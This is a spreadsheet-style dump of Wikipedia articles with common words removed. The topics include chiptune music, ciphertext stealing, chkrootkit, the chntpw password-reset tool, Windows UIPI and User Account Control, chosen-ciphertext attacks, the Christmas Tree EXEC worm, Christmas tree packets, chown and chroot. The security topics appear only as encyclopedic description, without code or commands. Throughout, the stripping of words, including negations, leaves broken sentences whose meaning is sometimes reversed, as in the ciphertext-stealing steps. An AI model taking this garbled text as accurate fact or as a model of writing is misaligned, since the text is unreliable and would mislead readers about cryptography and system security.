dirty electro-funk trancey electronic textures would feel comfortable nightclub video game." soundtrack streets rage (1994), koshiro created composition method called "automated composing system" produce "fast-beat techno like jungle", resulting innovative experimental sounds generated automatically. koshiro also composed chiptune soundtracks series dragon slayer, shinobi, actraiser. another important synth composer late umemoto, composed chiptune soundtracks various visual novel shoot games. music culture later several demo groups moved using music instead ripped game music. 1986, jeroen "red" kimmel studied hubbard's player routine used original demo songs writing routine 1987. hobbyists also writing dedicated music editor software, chris hülsbeck's soundmonitor released type-in listing 1986 issue german c-64 magazine 64'er.the practice music composition continued seamlessly conjunction commodore demoscene. high voltage collection, comprehensive archive music, contains 40,000 pieces music. mainstream popularity heyday chiptune music 1980s. earliest commercial chiptune records produced entirely sampling arcade game sounds existed since mid-1980s, early example haruomi hosono's video game music 1984. though entirely chiptune records uncommon time, many mainstream musicians rock,hip electronic music genres sampling arcade game sounds bleeps golden video arcade games (late 1970s mid-1980s), early yellow magic orchestra's "computer game" 1978. buckner garcia's "pac-man fever" album name major hits 1982. arcade game sounds foundational elements electro music genre, turn inspired many electronic dance music genres techno house music, sometimes referred "bleep music". space invaders inspired player one's "space invaders" (1979), turn provided bassline jesse saunders' (1984), first chicago house track.warp's record "testone" (1990) sweet exorcist sampled video game sounds yellow magic orchestra's "computer game" defined sheffield's bleep techno scene early 1990s.after 1980s, however, chiptune music began declining popularity. since then, 2000s, chip music rarely performed live songs nearly exclusively spread executable programs computer file formats. some earliest examples record label releases pure chip music found late 1990s. chiptune music began gaining popularity towards 1990s. first electroclash record, i-f's "space invaders smoking grass" (1997), described "burbling electro vocodered homage atari-era hi-jinks".by mid-2000s, 8-bit chip music began making comeback mainstream music, used acts beck (for example, 2005 song "girl"), killers (for example, 2004 song top"), doubt song "running", particularly postal service many songs. low-quality digital styling early game music composers hiroshi kawaguchi also began gaining popularity. 2003, j-pop girl group perfume, along producer yasutaka nakata, began producing music combining chiptunes synthpop electro house; breakthrough came 2007 game, japanese female artists using similar electronic style, including aira mitsuki, immi, mizca, sawa, saori@destiny, sweet vacation. electro house producer deadmau5 started career late 1990s, chiptune demoscene movements-influenced sound. three self-released compilations, project deadmau5 circa 1998–2002 little oblique, finished 2006.in 2007, entirely chiptune album 8-bit operators: music kraftwerk released major mainstream label astralwerks/emi records, included several prominent noted chipmusicians, including nanoloop creator oliver wittchow, littlesounddj creator johan kotlinski appears artist role model. kraftwerk founding member ralf hütter personally selected tracks. vinyl 12-inch single version released february 2007 precursor full-length reached high number billboard magazine dance singles sales chart. march 2007, release reached high number (north american college electronic) charts. edinburgh-born electronic musician unicorn helped popularize chiptune, especially song "true love fantasy" songs "tidal rave" played late night radio, including radio played live festive festival 2011. canada, eightcubed crystal castles helped popularity toronto underground club scene created lasting impression music video "heart invaders" debuting muchmusic 2008 single "alice practice" hitting 29th "150 best tracks past years".during late 2000s, wave chiptune culture took place, boosted release software littlesounddj game boy. this culture much emphasis live performances record releases demoscene tracker culture, artists often distantly aware. recent years, 8-bit chiptune sounds, "video game beats", used number mainstream artists. examples include artists kesha (most notably "tik tok", best-selling single 2010), cent single "ayo technology", robyn, snoop dogg,eminem (for example, "hellbound"), nelly furtado, timbaland (see timbaland plagiarism controversy). influence video game sounds also heard contemporary british electronica music artists dizzee rascal kieran hebden, well heavy metal bands dragonforce. grime music particular samples sawtooth wave sounds video games popular east london. some dubstep producers also influenced video game chiptunes, particularly work yuzo koshiro. 2010, article stated "sights sounds old-school games" (naming frogger donkey kong examples) "now becoming part mainstream music culture."complextro pioneer porter robinson also cited video game sounds, chiptunes, influence style music along 1980s analog synth music. tracker chiptunes commodore amiga (1985), sample-based sound generation, distanced concept microcomputer music away plain chip-synthesized sounds. amiga tracker music software, beginning karsten obarski's ultimate soundtracker (1987), inspired great numbers computer enthusiasts create computer music. offshoot burgeoning tracker music culture, type tracker music reminiscent commodore music born, utilized simple waveforms instead digitized samples. this type music came called "chiptunes", referring sound early video game console home computer sound chips. earliest examples tracker chiptunes date back 1989 attributed demoscene musicians 4mat, baroque, tdk, turtle duz. tracker chiptunes based short looped waveforms modulated tracker effects arpeggio, vibrato, portamento. small amount sample data made tracker chiptunes space-efficient types tracker music, made appealing size-limited demoscene demos crack intros. tracker chiptunes also commonly used warez scene executables keygens. nowadays, term "chiptune" also used cover chip music using actual chip-based synthesis, sources, amiga music preservation project, still define chiptune specifically small tracker module. contemporary chiptune music chip scene become relevant thanks "compos" held, groups releasing music disks cracktro/demo scene. tracker tools used making chip sounds available less techy musicians. platform midines, cartridge turns system full blown hardware midi controlled synthesizer. around 2007, mssiah released commodore similar midines, greater parameter controls, sequencing, analog drum emulation, limited sample playback. commodore open-source petsynth software, uses pet's 6522 chip sound, allows computer played like piano keyboard, features many effects. platform, fast tracker famous chiptune makers ability create hand-drawn samples mouse. chiptune artist pixelh8 also designed music software music tech game performer game advance nintendo turn machines real time synthesizers. there number television segments featuring chiptunes chip music artists past years. april 2005, weapon played songs "bombs away" "gameboy rocker" g4's attack show live broadcast episode #5058. 2008, parody masterpiece theatre, first four episodes boing boing video's spamasterpiece theater opened chiptune remix jean-joseph mouret's "rondeau: fanfare" (1735) hamhocks buttermilk johnson. another chipmusic feature included little-scale, dot.ay, thousand free their families cuomo australian abc2's television series good game 2009.the electronic frontier foundation december 2010 used faux 8-bit game 8-bit sound track crashfaster demonstrate notable legal achievements year.in march 2012, smithsonian american museum's "the video games" exhibit opened featuring chipmusic soundtrack entrance artists weapon computeher. weapon also created track called "the video games anthem" exhibit. september 2015, first music compilation based domo (nhk), domo loves chiptune, released itunes, amazon, major music streaming services. compilation features artists chiptune genre anamanaguchi disasterpeace. domo loves chiptune also features first chiptune remix domo theme song mystery mansion. york city chiptune scene also subject documentary called reformat planet player productions. this film official selection 2008 south southwest.chip music returned 21st-century gaming, either full-chip music style using chip samples music. popular games feature chiptune elements soundtracks include shovel knight undertale. live performances magfest chipspace events take place around world focus around celebration recognition chiptune music. united states, super magfest—a yearly convention hosts variety video game-related events—popular chiptune artists goto80 chipzel previously performed concert hall mainstage. chiptune-focused mainstage show (aptly named "chip rave") typically occurs third convention within concert hall featured countless prominent faces chiptune community. super magfest also holds continuous venue called chipspace, place participants chiptune community on-stage perform music open system. originally started chiptunes=win founder brandon hood maintained geekbeatradio, chipspace evolved course magfest's lifespan bring chiptune fans closer together. among daily performances showcases, curated chiptune netlabels chiptunes=win, geekbeatradio, more. references further reading external links "bleep bloop: charms chiptune" yorker's culture blog diggin’ carts: documentary series about japanese video game music, bull music academy</t>
  </si>
  <si>
    <t>Ciphertext stealing</t>
  </si>
  <si>
    <t>cryptography, ciphertext stealing (cts) general method using block cipher mode operation allows processing messages evenly divisible blocks without resulting expansion ciphertext, cost slightly increased complexity. general characteristics ciphertext stealing technique encrypting plaintext using block cipher, without padding message multiple block size, ciphertext size plaintext. altering processing last blocks message. processing last blocks unchanged, portion second-last block's ciphertext "stolen" last plaintext block. padded final block encrypted usual. final ciphertext, last blocks, consists partial penultimate block (with "stolen" portion omitted) plus full final block, size original plaintext. decryption requires decrypting final block first, restoring stolen ciphertext penultimate block, decrypted usual. principle block-oriented block cipher mode operation used, stream-cipher-like modes already applied messages arbitrary length without padding, benefit technique. common modes operation coupled ciphertext stealing electronic codebook (ecb) cipher block chaining (cbc). ciphertext stealing mode requires plaintext longer block. possible workaround stream cipher-like block cipher mode operation plaintext length block less, ctr, modes. ciphertext stealing mode necessarily require plaintext longer block. case plaintext block long less, initialization vector (iv) prior block ciphertext. case modified must sent receiver. this possible situations freely chosen sender ciphertext sent (e.g., derived pre-established value), case ciphertext stealing mode occur plaintexts longer block. implement encryption decryption data unknown length, implementation must delay processing (and buffer) recent blocks data, properly processed data stream. ciphertext format there several different ways arrange ciphertext transmission. ciphertext bits cases, transmitted different order, choice security implications; purely implementation convenience. numbering taken dworkin, describes all. third popular, described daemen schneier; meyer describes related, incompatible scheme (with respect ordering use). arguably obvious arrange ciphertext transmit truncated penultimate block, followed full final block. this convenient receiver reasons: receiver must decrypt final block first case, this results final block aligned natural boundary, complicating hardware implementations.this advantage that, final plaintext block happens multiple block size, ciphertext identical original mode operation without ciphertext stealing. often convenient swap final ciphertext blocks, ciphertext ends full final block, followed truncated penultimate block. this results naturally aligned ciphertext blocks. order maintain compatibility non-stealing modes, option performs swap amount stolen ciphertext non-zero, i.e. original message multiple block size. this maintains natural alignment, compatibility non-stealing modes, requires treating cases aligned unaligned message size differently. popular alternative swaps final ciphertext blocks unconditionally. this ordering used descriptions below. ciphertext stealing mode description order encrypt decrypt data, standard block cipher mode operation last blocks data. following steps describe handle last blocks plaintext, called pn−1 length pn−1 equals block size cipher bits, length last block, bits; use. range inclusive, could possibly complete block. mode description also makes ciphertext block previous blocks concerned, cn−2, fact plaintext fits within blocks. description, following functions operators used: head (data, returns first bits 'data' string. tail (data, returns last bits 'data' string. encrypt data): underlying block cipher encrypt mode 'data' string using decrypt data): underlying block cipher decrypt mode 'data' string using xor: bitwise exclusive-or. equivalent bitwise addition without carry bit. concatenation operator. combine strings either side operator. string bits. ciphertext stealing ciphertext stealing mode introduces inter-block dependency within last blocks, resulting altered error propagation behavior last blocks. encryption steps (see figure) en−1 encrypt pn−1). encrypt pn−1 create en−1. this equivalent behavior standard mode. head (en−1, select first bits en−1 create final ciphertext block, composed leading bits second-to-last ciphertext block. cases, last blocks sent different order corresponding plaintext blocks. tail (en−1, b−m). order bits en−1. cn−1 encrypt dn). encrypt create cn−1. first bits, equivalent would happen mode (other ciphertext ordering). last bits, second time data encrypted already encrypted production en−1 step decryption steps decrypt cn−1). decrypt cn−1 create this undoes step encryption process. en−1 tail (dn, b−m). extracted ciphertext tail (placed step encryption process). head (dn, select first bits create described step encryption process, first bits contain queue last (possibly partial) block eventual output. pn−1 decrypt en−1). decrypt en−1 create pn−1. this reverses encryption step ciphertext stealing error propagation error transmission cn−1 would result block-wide corruption pn−1 error transmission would result block-wide corruption pn−1. this significant change ecb's error propagation behavior. ciphertext stealing cbc, already interaction processing different adjacent blocks, less conceptual impact mode. error propagation affected. encryption steps xn−1 pn−1 cn−2. exclusive-or pn−1 previous ciphertext block, cn−2, create xn−1. this equivalent behavior standard mode. en−1 encrypt xn−1). encrypt xn−1 create en−1. this equivalent behavior standard mode. head (en−1, select first bits en−1 create final ciphertext block, composed leading bits second-to-last ciphertext block. cases, last blocks sent different order corresponding plaintext blocks. 0b−m. zeros create length zero padding step important step en−1 exclusive-or en−1 create first bits block, equivalent mode; first bits previous block's ciphertext, en−1,are xored bits plaintext last plaintext block. zero padding step important, makes operation's effect last bits equivalent copying last bits en−1 these bits stripped en−1 step created. cn−1 encrypt dn). encrypt create cn−1. first bits, equivalent would happen mode (other ciphertext ordering). last bits, second time data encrypted already encrypted production en−1 step decryption steps decrypt cn−1). decrypt cn−1 create this undoes step encryption process. 0b−m. zeros create block length padding zeros help step exclusive-or create looking first bits, step result xoring (the first bits encryption process' en−1) (now decrypted) head (en−1, (see steps encryption process). words, decrypted first bits looking last bits, recovers last bits en−1. head (xn, select first bits create described step first bits contain queue last (possibly partial) block eventual output. en−1 tail (xn, b−m). append tail (b−m) bits create en−1. described step en−1 composed (which bits long) appended last bits reassemble en−1 (which en−1 seen encryption process) processing step xn−1 decrypt en−1). decrypt en−1 create xn−1. this reverses encryption step xn−1 encryption process. pn−1 xn−1 cn−2. exclusive-or xn−1 previous ciphertext block, cn−2, create pn−1. finally, reverse step step encryption process. implementation notes ciphertext stealing, clever (but opaque) method implementing described ciphertext stealing process using standard interface. using method imposes performance penalty decryption stage extra block decryption operation would necessary using dedicated implementation. ciphertext stealing encryption using standard interface last partial plaintext block encrypt whole padded plaintext using standard mode. swap last ciphertext blocks. truncate ciphertext length original plaintext. ciphertext stealing decryption using standard interface decrypt cn−1). decrypt second-to-last ciphertext block using mode. tail (dn, b−m). ciphertext nearest multiple block size using last bits block cipher decryption second-to-last ciphertext block. swap last ciphertext blocks. decrypt (modified) ciphertext using standard mode. truncate plaintext length original ciphertext. ciphertext stealing error propagation error transmission cn−1 would result block-wide corruption pn−1 error transmission would result corresponding error block-wide corruption pn−1. references daemen, joan (1995). "2.5.1 2.5.2". cipher hash function design, strategies based linear differential cryptanalysis (pdf) (ph.d. thesis). katholieke universiteit leuven. schneier, bruce (1995). applied cryptography (2nd ed.). john wiley sons, inc. 191, 195. isbn 978-0-471-12845-8. meyer, carl matyas, stephen (1982). cryptography: dimension computer data security. john wiley sons, inc. 77–85. isbn 978-0-471-04892-3. baldwin; rivest (october 1996). rc5, rc5-cbc, rc5-cbc-pad, rc5-cts algorithms. doi:10.17487/rfc2040. 2040. dworkin, morris (october 2011). recommendation block cipher modes operation: three variants ciphertext stealing mode (pdf). national institute standards technology (nist). addendum nist special 800-38a.</t>
  </si>
  <si>
    <t>Chkrootkit</t>
  </si>
  <si>
    <t>chkrootkit (check rootkit) common unix-based program intended help system administrators check system known rootkits. shell script using common unix/linux tools like strings grep commands search core system programs signatures comparing traversal /proc filesystem output (process status) command look discrepancies. used rescue disc (typically live optionally alternative directory commands. these techniques allow chkrootkit trust commands upon depends more. there inherent limitations reliability program attempts detect compromises (such rootkits computer viruses). newer rootkits specifically attempt detect compromise copies chkrootkit programs take measures evade detection them. also host-based intrusion detection system comparison hardening (computing) linux malware malwaremustdie rkhunter lynis ossec samhain (software) references external links official website</t>
  </si>
  <si>
    <t>Chntpw</t>
  </si>
  <si>
    <t>chntpw software utility resetting blanking local passwords used windows 2000, vista, editing database windows stores password hashes. features there ways program: standalone chntpw utility installed package available modern linux distributions (e.g. ubuntu) bootable cd/usb image. there also floppy release, support dropped. limitations chntpw support fully encrypted ntfs partitions (the possible exceptions encrypted partitions readable linux e.g. luks), usernames containing unicode characters, active directory passwords (with exception local users systems members domain). password changing feature also fully functional either, password blanking highly recommended fact, later versions windows that's possible option). furthermore, bootable image might problems controllers requiring party drivers. cases stand-alone program full-featured linux environment recommended. where used chntpw utility included many various linux distributions, including ones focused security: kali security-focused linux distribution systemrescuecd recovery-focused linux distribution fedora general distribution ubuntu linux distribution published canonical (along many others listed here) license change software's 10th anniversary, author changed license non-commercial general public license (gpl) version references external links offline password registry editor</t>
  </si>
  <si>
    <t>User Interface Privilege Isolation</t>
  </si>
  <si>
    <t>user interface privilege isolation (uipi) technology introduced windows vista windows server 2008 combat shatter attack exploits. making mandatory integrity control, prevents processes lower "integrity level" (il) sending messages higher processes (except specific messages). window messages designed communicate user action processes. however, used arbitrary code receiving process' context. this could used malicious low-privilege processes arbitrary code context higher-privilege process, constitutes unauthorized privilege escalation. restricting ability lower-privileged processes send window messages higher-privileged processes, uipi mitigate kinds attacks.uipi, mandatory integrity control generally, security feature security boundary.microsoft office 2010 uses uipi protected view sandbox prohibit potentially unsafe documents modifying components, files, resources system. references</t>
  </si>
  <si>
    <t>Chosen-ciphertext attack</t>
  </si>
  <si>
    <t>chosen-ciphertext attack (cca) attack model cryptanalysis cryptanalyst gather information obtaining decryptions chosen ciphertexts. from pieces information adversary attempt recover hidden secret used decryption. formal definitions security chosen-ciphertext attacks, example: michael luby mihir bellare introduction number otherwise secure schemes defeated chosen-ciphertext attack. example, gamal cryptosystem semantically secure chosen-plaintext attack, semantic security trivially defeated chosen-ciphertext attack. early versions padding used protocol vulnerable sophisticated adaptive chosen-ciphertext attack revealed session keys. chosen-ciphertext attacks implications self-synchronizing stream ciphers well. designers tamper-resistant cryptographic smart cards must particularly cognizant attacks, devices completely control adversary, issue large number chosen-ciphertexts attempt recover hidden secret key. clear whether public cryptosystems withstand chosen ciphertext attack initial breakthrough work moni naor moti yung 1990, suggested mode dual encryption integrity proof (now known "naor-yung" encryption paradigm). this work made understanding notion security chosen ciphertext attack much clearer open research direction constructing systems various protections variants attack. when cryptosystem vulnerable chosen-ciphertext attack, implementers must careful avoid situations adversary might able decrypt chosen-ciphertexts (i.e., avoid providing decryption oracle). this difficult appears, even partially chosen ciphertexts permit subtle attacks. additionally, issues exist cryptosystems (such rsa) mechanism sign messages decrypt them. this permits attacks hashing used message signed. better approach cryptosystem provably secure chosen-ciphertext attack, including (among others) rsa-oaep secure random oracle heuristics, cramer-shoup first public practical system secure. symmetric encryption schemes known authenticated encryption primitive based symmetric encryption gives security chosen ciphertext attacks, first shown jonathan katz moti yung. varieties chosen-ciphertext attacks, like attacks, adaptive non-adaptive. adaptive chosen-ciphertext attack, attacker results prior decryptions inform choices ciphertexts decrypted. non-adaptive attack, attacker chooses ciphertexts decrypted without seeing resulting plaintexts. after seeing plaintexts, attacker longer obtain decryption additional ciphertexts. lunchtime attacks specially noted variant chosen-ciphertext attack "lunchtime", "midnight", "indifferent" attack, attacker make adaptive chosen-ciphertext queries certain point, attacker must demonstrate improved ability attack system. term "lunchtime attack" refers idea user's computer, ability decrypt, available attacker user lunch. this form attack first commonly discussed: obviously, attacker ability make adaptive chosen ciphertext queries, encrypted message would safe, least ability taken away. this attack sometimes called "non-adaptive chosen ciphertext attack"; here, "non-adaptive" refers fact attacker cannot adapt queries response challenge, given ability make chosen ciphertext queries expired. adaptive chosen-ciphertext attack (full) adaptive chosen-ciphertext attack attack ciphertexts chosen adaptively challenge ciphertext given attacker, stipulation challenge ciphertext queried. this stronger attack notion lunchtime attack, commonly referred cca2 attack, compared cca1 (lunchtime) attack. practical attacks form. rather, model important proofs security chosen-ciphertext attacks. proof attacks model impossible implies realistic chosen-ciphertext attack cannot performed. practical adaptive chosen-ciphertext attack bleichenbacher attack pkcs#1.numerous cryptosystems proven secure adaptive chosen-ciphertext attacks, proving security property based algebraic assumptions, additionally requiring idealized random oracle assumption. example, cramer-shoup system secure based number theoretic assumptions idealization, number subtle investigations also established practical scheme rsa-oaep secure assumption idealized random oracle model. also dancing volcano: chosen ciphertext attacks apple imessage (usenix 2016) references</t>
  </si>
  <si>
    <t>User Account Control</t>
  </si>
  <si>
    <t>user account control (uac) mandatory access control enforcement feature introduced microsoft's windows vista windows server 2008 operating systems, relaxed version also present windows windows server 2008 windows windows server 2012, windows 8.1, windows server 2012 windows windows aims improve security microsoft windows limiting application software standard user privileges administrator authorises increase elevation. way, applications trusted user receive administrative privileges malware kept compromising operating system. words, user account administrator privileges assigned applications user runs inherit privileges unless approved beforehand user explicitly authorises uses mandatory integrity control isolate running processes different privileges. reduce possibility lower-privilege applications communicating higher-privilege ones, another technology, user interface privilege isolation, used conjunction user account control isolate processes other. prominent internet explorer "protected mode".operating systems mainframes servers differentiated superusers userland decades. this obvious security component, also administrative component, prevented users accidentally changing system settings. early microsoft home operating-systems (such ms-dos, windows 95-98 windows concept different user-accounts machine. subsequent versions windows microsoft applications encouraged non-administrator user-logons, applications continued require administrator rights. microsoft certify applications windows-compliant require administrator privileges; applications windows-compliant logo packaging. behavior windows versions ms-dos windows versions 3.11: applications privileges equivalent operating system; windows applications enjoyed system-wide privileges rivaling operating system itself; versions windows windows introduced multiple user-accounts, practice users continued function administrator normal operations. further, applications would require user administrator functions work. windows vista: microsoft developed vista security firstly limited user account (lua), renamed concept user account protection (uap) finally shipping user account control (uac). introduced windows vista, user account control (uac) offers approach encourage "super-user necessary". lies ability elevate privileges without changing user context (user "bob" still user "bob"). always, difficult introduce security features without breaking compatibility existing applications. when someone logs vista standard user, system sets logon session assigns token containing basic privileges. way, logon session cannot make changes would affect entire system. when person logs user membership administrators group, system assigns separate tokens: first token contains privileges typically awarded administrator, second restricted token similar standard user would receive. user applications, including windows shell, start restricted token, resulting reduced-privilege environment even running administrator account. when application requests higher privileges user selects "run administrator" option, prompt standard users enter credentials administrator account prompt administrators confirmation and, consent given, continue start process using unrestricted token. windows microsoft included user interface change user account control settings, introduced notification mode: default setting. default, prompt consent users make changes windows settings require elevated permission programs stored %systemroot% digitally signed microsoft. programs require permission still trigger prompt. other user account control settings changed could accessed registry windows vista. windows 8.1: design change. when triggered, applications taskbar hidden desktop dimmed. windows copies layout windows 8.1, anniversary update modern look. also, windows adds support windows hello user account control dialog box. tasks trigger prompt tasks require administrator privileges trigger prompt enabled); typically marked security shield icon colors windows logo vista windows server 2008) panels yellow blue (windows windows server 2008 later). case executable files, icon security shield overlay. following tasks require administrator privileges: running application administrator changes system-wide settings changes files folders standard users permissions (such %systemroot% %programfiles% cases) changes access control list (acl), commonly referred file folder permissions installing uninstalling applications outside %userprofile% (e.g. c:\users\{logged user}) folder sub-folders. most time %appdata%. (e.g. c:\users\{logged user}\appdata), default, hidden folder. chrome's firefox's installer admin rights install, given, chrome install program files folder usable users, denied, chrome install %appdata% folder instead usable current user. microsoft store. folder installer sub-folders. steam installs games /steamapps/ sub-folder, thus prompting uac. some games require prerequisites installed, prompt uac. installing device drivers installing activex controls changing settings windows firewall changing settings configuring windows update adding removing user accounts changing user's account name type creating account deleting user account turning guest account (windows 8.1) turning network discovery, file printer sharing, public folder sharing, turning password protected sharing turning media streaming configuring parental controls windows family safety (windows 8.1) running task scheduler backing restoring folders files merging deleting network locations turning cleaning logging remote access preferences running color calibration changing remote, system protection advanced system settings restoring backed-up system files viewing changing another user's folders files running disk defragmenter, system restore windows easy transfer (windows 8.1) running registry editor running windows experience index assessment troubleshoot audio recording playing, hardware devices power change power settings, turning windows features, uninstall, change repair program change date time synchronizing internet time server installing uninstalling display languages change ease access administrative settingscommon tasks, changing time zone, require administrator privileges (although changing system time does, since system time commonly used security protocols kerberos). number tasks required administrator privileges earlier versions windows, installing critical windows updates, longer require administrator privileges vista. program administrator right-clicking icon clicking "run administrator", except packages nature, administrator rights required prompt usually shown. should fail, workaround command prompt administrator launch package there. features user account control asks credentials secure desktop mode, entire screen temporarily dimmed, windows aero disabled, authorization window full brightness, present elevation user interface (ui). normal applications cannot interact secure desktop. this helps prevent spoofing, overlaying different text graphics elevation request, tweaking mouse pointer click confirmation button that's user intended. administrative activity comes minimized application, secure desktop request also minimized prevent focus lost. possible disable secure desktop, though inadvisable security perspective.in earlier versions windows, applications written assumption user running administrator privileges experienced problems limited user accounts, often attempted write machine-wide system directories (such program files) registry keys (notably hklm). attempts alleviate using file registry virtualization, redirects writes (and subsequent reads) per-user location within user's profile. example, application attempts write directory "c:\program files\appname\settings.ini" user write permission, write redirected "c:\users\username\appdata\local\virtualstore\program files\appname\settings.ini". redirection feature provided non-elevated 32-bit applications, include manifest requests specific privileges.there number configurable settings. possible require administrators re-enter password heightened security, require user press ctrl+alt+del part authentication process heightened security; disable file registry virtualization disable admin approval mode (uac prompts administrators) entirely; note that, disables confirmation dialogs, disable windows' built-in feature, means users, even marked administrators, still limited users true administrative access.command prompt windows running elevated prefix title window word "administrator", user discern instances running elevated privileges.a distinction made elevation requests signed executable unsigned executable; former, whether publisher 'windows vista'. color, icon, wording prompts different case; example, attempting convey greater sense warning executable unsigned not.internet explorer "protected mode" feature uses 'low' integrity level standard user token integrity level 'medium'; elevated (administrator) token integrity level 'high'). such, effectively runs sandbox, unable write system (apart temporary internet files folder) without elevating uac. since toolbars activex controls within internet explorer process, privileges well, severely limited damage system. requesting elevation program request elevation number different ways. program developers requestedprivileges section document, known manifest, embedded application. manifest specify dependencies, visual styles, appropriate security context: setting level attribute requestedexecutionlevel "asinvoker" make application token started "highestavailable" present prompt administrators usual reduced privileges standard users, "requireadministrator" require elevation. highestavailable requireadministrator modes, failure provide confirmation results program launched. executable marked "requireadministrator" manifest cannot started non-elevated process using createprocess(). instead, error_elevation_required returned. shellexecute() shellexecuteex() must used instead. hwnd supplied, dialog show blinking item taskbar. inspecting executable's manifest determine requires elevation recommended, elevation required reasons (setup executables, application compatibility). however, possible programmatically detect executable require elevation using createprocess() setting dwcreationflags parameter create_suspended. elevation required, error_elevation_required returned. elevation required, success return code returned point terminateprocess() newly created, suspended process. this allow detect executable requires elevation already executing elevated process, however. process elevated privileges spawned within .net application using "runas" verb. example using native win32 application "runas" verb added shellexecute() shellexecuteex() call: absence specific directive stating privileges application requests, apply heuristics, determine whether application needs administrator privileges. example, detects application setup program, clues filename, versioning fields, presence certain sequences bytes within executable, absence manifest assume application needs administrator privileges. security convenience feature; neither introduces security boundary prevents execution malware.leo davidson discovered microsoft weakened windows exemption windows programs displaying prompt presented proof concept privilege escalation.stefan kanthak presented proof concept privilege escalation uac's installer detection iexpress installers.stefan kanthak presented another proof concept arbitrary code execution well privilege escalation uac's auto-elevation binary planting. criticism there complaints notifications slow various tasks computer initial installation software onto windows vista. possible turn installing software, re-enable later time. however, recommended since, file registry virtualization active turned user settings configuration files installed different place system directory rather user-specific directory) switched would otherwise. also internet explorer "protected mode", whereby browser runs sandbox lower privileges standard user, relies uac; function disabled.yankee group analyst andrew jaquith said, months vista released, "while security system shows promise, chatty annoying." time windows vista released november 2006, microsoft drastically reduced number operating system tasks triggered prompts, added file registry virtualization reduce number legacy applications triggered prompts. however, david cross, product unit manager microsoft, stated conference 2008 fact designed "annoy users," force independent software vendors make programs secure prompts would triggered. software written windows many peripherals, would longer work windows vista extensive changes made introduction uac. compatibility options also insufficient. response criticisms, microsoft altered activity windows example, default users prompted confirm many actions initiated mouse keyboard alone operating control panel applets. controversial article, york times gadgetwise writer paul boutin said "turn vista's overly protective user account control. those pop-ups like mother hover shoulder work." computerworld journalist preston gralla described article "...one worst pieces technical advice ever issued." also comparison privilege authorization features features windows vista polkit runas secure attention (sak) security safety features windows vista sudo similar feature unix-like operating systems references external links turning windows documentation windows windows server 2008, windows server 2008 windows vista understanding configuring more information microsoft technet development requirements user account control compatibility more information microsoft developer network team blog</t>
  </si>
  <si>
    <t>Chown</t>
  </si>
  <si>
    <t>command chown abbreviation change owner, used unix unix-like operating systems change owner file system files, directories. unprivileged (regular) users wish change group membership file chgrp. ownership file system altered super-user. user cannot give away ownership file, even user owns similarly, member group change file's group group.the command available separate package microsoft windows part unxutils collection native win32 ports common unix-like utilities. chown command also ported operating system. syntax chown name_of_new_owner file_name chown newuser:newgroup file_name also chgrp chmod takeown references external links chown shell utilities reference, single unix specification, version open group chown manual page chown command linux information project (linfo)</t>
  </si>
  <si>
    <t>Christmas Tree EXEC</t>
  </si>
  <si>
    <t>christmas tree exec first widely disruptive computer worm, paralyzed several international computer networks december 1987. virus vm/cms operating system. written student clausthal university technology rexx scripting language, drew crude christmas tree text graphics, sent entry target's email contacts file. spread onto european academic research network (earn), bitnet, ibm's worldwide vnet. systems caused massive disruption. core mechanism iloveyou worm 2000 essentially christmas tree, although rather mainframes, spread different network, scripted using vbscript rather rexx. name actually "christma exec" systems originally required file names formatted 8+space+8 characters. additionally, required rexx script files file type "exec". name sometimes written "christmas exec" (adding character) make name readable. user prompted "...just type christmas..."—and fact launched "worm". worm would read user's names file, contained list users remote nodes transmit worm worm would sendfile command transmit worm remote users, would presumably repeating cycle. some versions worm concealed code. actual executable part worm contained several overly long lines (more characters) visible unless user scrolled screen right. 3279 color terminal would display christmas tree blinking colored characters (asterisks) represent tree lights. displays message program forwards mailbox addresses contained user's address file. ***** ******* ********* ************* ******* *********** very *************** ******************* happy *********** *************** christmas ******************* *********************** *************** ******************* best wishes *********************** *************************** next ****** ****** year ****** also trojan horse (computing) timeline computer viruses worms ascii references further reading burger, ralf (1988). computer viruses high tech disease. abacus/data becker gmbh. 276. isbn 1-55755-043-3. capek, p.g.; chess, d.m.; white, s.r.; fedeli, (2003). "merry christma: early network worm". ieee security privacy. (5): 26–34. doi:10.1109/msecp.2003.1236232. martin, will (march 1988). "re: bitnet security". security digest (mailing list). archived original september 2006. retrieved october 2008. patterson, ross (december 1987). "re: christmas virus". risks digest (mailing list). retrieved october 2008. "viruses "exotic" platforms". heaven. archived original september 2008. retrieved october 2008. external links source code (archived)</t>
  </si>
  <si>
    <t>Christmas tree packet</t>
  </si>
  <si>
    <t>information technology, christmas tree packet packet every single option whatever protocol use. background term derives fanciful image little option header represented different-colored light bulb, turned "the packet like christmas tree". also known kamikaze packet, nastygram, lamp test segment. christmas tree packets used method tcp/ip stack fingerprinting, exposing underlying nature tcp/ip stack sending packets awaiting analyzing responses. when used part scanning system, header christmas tree packet flags fin, set. many operating systems implement compliance internet protocol standards varying incomplete ways. observing host responds packet, christmas tree packet, inferences made regarding host's operating system. versions microsoft windows, bsd/os, hp-ux, cisco ios, mvs, irix display behaviors differ standard queried said packets.a large number christmas tree packets also used conduct attack exploiting fact christmas tree packets require much processing routers end-hosts "usual" packets christmas tree packets easily detected intrusion-detection systems advanced firewalls. from network security point view, christmas tree packets always suspicious indicate high probability network reconnaissance activities. also martian packet references external links nmap documentation</t>
  </si>
  <si>
    <t>Chroot</t>
  </si>
  <si>
    <t>chroot unix unix-like operating systems operation changes apparent root directory current running process children. program modified environment cannot name (and therefore normally cannot access) files outside designated directory tree. term "chroot" refer chroot(2) system call chroot(8) wrapper program. modified environment called chroot jail. history chroot system call introduced development version unix 1979. source suggests bill added march 1982 months 4.2bsd released order test installation build system. versions kernel chroot(2). early term "jail" applied chroot comes bill cheswick creating honeypot monitor hacker 1991.the first article jailbreak discussed security column sunworld online written carole fennelly; august 1999 january 1999 editions cover chroot() topics.to make useful virtualization, freebsd expanded concept release 2000 introduced jail command.by 2002, article written nicolas boiteux described create jail linux 2003, first internet microservices providers linux jails provide saas/paas (shell containers, proxy, ircd, bots, ...) services billed consumption jail usageby 2005, released solaris containers (also known solaris zones), described "chroot steroids."by 2008, (upon docker later built) adopted "container" terminology gained popularity 2013 inclusion linux kernel user namespaces. uses chroot environment used create host separate virtualized copy software system. this useful for: testing development test environment chroot software would otherwise risky deploy production system. dependency control software developed, built tested chroot populated expected dependencies. this prevent kinds linkage skew result developers building projects different sets program libraries installed. compatibility legacy software software using different must sometimes chroot supporting libraries data files otherwise clash name linkage host system. recovery should system rendered unbootable, chroot used move back damaged environment bootstrapping alternate root file system (such installation media, live cd). privilege separation programs allowed carry open file descriptors (for files, pipelines network connections) chroot, simplify jail design making 